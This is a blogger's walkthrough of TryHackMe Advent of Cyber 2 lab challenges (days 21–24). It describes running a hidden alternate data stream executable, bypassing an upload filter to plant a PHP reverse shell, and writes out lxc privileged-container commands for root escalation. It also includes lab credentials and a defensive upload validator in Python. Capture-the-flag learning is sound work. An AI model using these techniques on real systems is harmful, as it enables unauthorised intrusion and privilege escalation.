What is the file hash of the mysterious executable within the Documents folder?
PS C:\Users\littlehelper\Documents> Get-FileHash -Algorithm MD5 .\deebee.exe
I used this command to be able to retrieve the MD5 hash of that particular file.
Challenge 3
Using Strings find the hidden flag within the executable?
PS C:\Users\littlehelper\Documents> C:\Tools\strings64.exe .\deebee.exe
Challenge 4
What is the flag that is displayed when you run the database connector file?
First, I needed to uncover any ADS deebee.exe might have. I used the following command to find that.
PS C:\Users\littlehelper\Documents> Get-Item -Path .\deebee.exe -Stream *
This command revealed the hidedb ADS. Next, to launch the hidden executable, I ran the following command:
PS C:\Users\littlehelper\Documents> wmic process call create $(Resolve-Path .\deebee.exe:hidedb)
And there it was...The flag for the last challenge! Another interesting PowerShell challenge!
[Day 22] Elf McEager becomes CyberElf
Blue Teaming | Cyberchef | Encoding
The past few days there have been strange things happening at Best Festival Company. McEager hasn't had the time to fully investigate the compromised endpoints with everything that is going on nor does he have the time to reimage the workstations. McEager decides to log into a different workstation, one of his backup systems.
McEager logs in and to his dismay he can't log into his password manager. It's not accepting his master key! He notices that the folder name has been renamed to something strange.
Task: You must gain access to the password manager and decode the values within the password manager using CyberChef.
RDP Creds
Username: Administrator Password: sn0wF!akes!!!
Initial RDP reveals a file located on the desktop with what seems to be a base64 encoded file name. Thus, I went over to my trusted site to decode that!
After decoding, I got the string thegrinchwashere.
Upon further inspection, I realized that the folder contained an installation of the open source password manager, KeePass.
When I launched the password manager, I was prompted for a master password. This is where the string I found earlier came in handy. I entered thegrinchwashere and I was let in by the application.
Now, I had access to all the passwords in the database!
The Elf Security System entry has an unusually large notes section. Throwing that into CyberChef and decoding it with the From Charcode module revealed the flag!
And that was the end of day 22!
[Day 23] The Grinch strikes again!
Blue Teaming | Volume shadow copy service | Windows forensics
The mayhem at Best Festival Company continues. McEager receives numerous emails and phone calls about a possible ransomware attack affecting all the endpoints in the network. McEager knows that the endpoints which are infected with the malware don't have any backup copies but luckily on his workstation he has backups enabled.
Task: Investigate the malware and restore the files to their original
RDP Creds
Username: Administrator Password: sn0wF!akes!!!
This was what I was greeted with when I RDPd into the machine.
The Volume Shadow Copy Service (VSS) coordinates the actions that are required to create a consistent shadow copy (also known as a snapshot or a point-in-time copy) of the data that is to be backed up.
Shadow Copy is a technology included in Microsoft Windows that can create backup copies or snapshots of computer files or volumes, even when they are in use.
The first thing I did was to check if there was any backups made. Thankfully there was a copy that was made to the backup drive as seen below.
Now that I found out that there were backups, I had to assign a drive letter and path to be able to access the drive via the file explorer.
Now, I was able to access the other backup drive and view its contents!
Challenge 1
What is the name of the suspicious scheduled task?
Challenge 2
Inspect the properties of the scheduled task. What is the location of the executable that is run at login?
Challenge 3
There is another scheduled task that is related to VSS. What is the ShadowCopyVolume ID?
Challenge 4
Assign the hidden partition a letter. What is the name of the hidden folder?
And...that was the end of that. Another cool little Windows challenge educating on the Volume Shadow Copy Service!
[Day 24] The Trial Before Christmas
Special | Web | Linux
"Elf McEager - your boundless effort to save Christmas this year has not gone unnoticed. I wanted to reward you with a special present, however, there's a catch. Elf McSkidy and I have seen your skills advance and we feel it would only be appropriate to give you a present after one last challenge. Inside this package, you'll have also found a computer. Plug this into the network and hack into it. Best of luck and Merry Christmas - Santa"
Without delay, Elf McEager connected the NUC appropriately and watched it whir to life. A small screen nearby the power button blinked and then displayed the IP address assigned to the device. Next to the IP, a small symbol appeared. McEager quietly wondered to himself what it could mean as he logged into his terminal, ready to start his final challenge.
Target = 10.10.77.22
As always, I ran my NMAP scan against the target to gain more information.
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day24] └─$ nmap -p- -T5 10.10.77.22
Challenge 1
What's the title of the hidden website?
Challenge 2
What is the name of the hidden php page?
For this challenge, I ran gobuster with the -x option set to php so that the program would only fuzz for php pages!
┌──(nee㉿kali)-[~] └─$ gobuster dir -u http://10.10.77.22:65000 -x php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40
uploads.php
Now that I had uncovered an upload page, I shifted my focus to try and upload a reverse shell to gain access!
Upon inspection of the source, I realized that the site only accepts .png, .jpg or .jpeg. Thus, I fired up Burp Suite to bypass both the client-side and any possible server-side filtering!
I first headed to the interception rules and removed ^js$|. This allows the proxy to intercept JS files too. By intercepting JS files, I could simply drop the filter JS file, which bypasses the client-side filtering.
Now, I'd simply be able to upload my php reverse shell and gain access!
Next, I set up a NetCat listener on my host machine to catch any incoming connections from the server.
Following that, I went to the grid directory, which was uncovered earlier by the dirbuster scan and which also happened to be where all uploaded files were stored. I then clicked on the file to trigger a reverse connection back to my host machine!
I also used python3 -c 'import pty;pty.spawn("/bin/bash")' to spawn a better-featured bash shell after I was in.
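The upload form above only enforced its .png/.jpg/.jpeg rule in browser-side JavaScript, which is why dropping that script was enough. As an added example (my own code, not the challenge's), here is what the same rule looks like when enforced on the server, with the sample uploads constructed inline.

```python
import os
import secrets
from pathlib import Path

# Server-side allowlist for the upload form; the browser-side JS check is only a convenience.
ALLOWED_EXT = {".png", ".jpg", ".jpeg"}
# Bytes a real file of each allowed type must begin with.
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
}

# Constructed sample uploads for the demonstration (not files from the challenge box).
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SAMPLE_PHP = b"<?php echo 'hello'; ?>"


def validate_upload(filename: str, data: bytes) -> tuple:
    """Return (ok, reason). Every decision is made from the bytes the server
    received, so removing the client-side filter script changes nothing."""
    name = os.path.basename(filename)   # drop any path components such as ../
    ext = Path(name).suffix.lower()     # 'shell.php.png' -> '.png', 'shell.php' -> '.php'
    if ext not in ALLOWED_EXT:
        return False, "extension not allowed"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not look like %s" % ext
    return True, "ok"


def stored_name(filename: str, data: bytes):
    """Name under which an accepted upload is written: a random token plus the
    allow-listed extension, so the uploader controls neither the name nor the
    extension the web server later sees. Returns None for rejected uploads."""
    ok, _ = validate_upload(filename, data)
    if not ok:
        return None
    return secrets.token_hex(16) + Path(os.path.basename(filename)).suffix.lower()
```

A polyglot (a valid image header with PHP appended) still passes the magic-byte check, so the random name with a fixed image extension and an upload directory that the web server never executes are the controls that actually matter.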
Challenge 3
What is the value of the web.txt flag?
Continuing my post exploitation led me to find the DB authentication details in the web directory!
Now that I had access to the database, I went and took a peek inside. I managed to find a db named tron and in that db was a table named users with a single entry!
Challenge 4
Crack the password. What is it?
I then used this free password hash cracker to get the password!
Challenge 5
What is the value of the user.txt flag?
Now that I had the password for the user flynn, I just su-ed into the account and grabbed the flag.
Challenge 6
What is the value of the root.txt flag?
I found that the user flynn was a member of the group lxc. Thus, I went ahead and attempted privilege escalation via that service.
When running lxc image list as shown below, I realized that the target machine already had an alpine v3.12 image available for me to mount my root directory on to.
I then ran the following commands to create the container, mount the entire volume of the target machine into it and start it.
lxc init -c security.privileged=true
lxc config device add disk source=/ path=/mnt/root recursive=true
lxc start
lxc exec /bin/sh
End of day 24!
And that marks the end of the Advent of Cyber 2! That was a solid 24 day challenge 😊 I got to learn various things related to cyber security. Thanks to the folks over to THM and all other entities who made this event possible!
~Nee!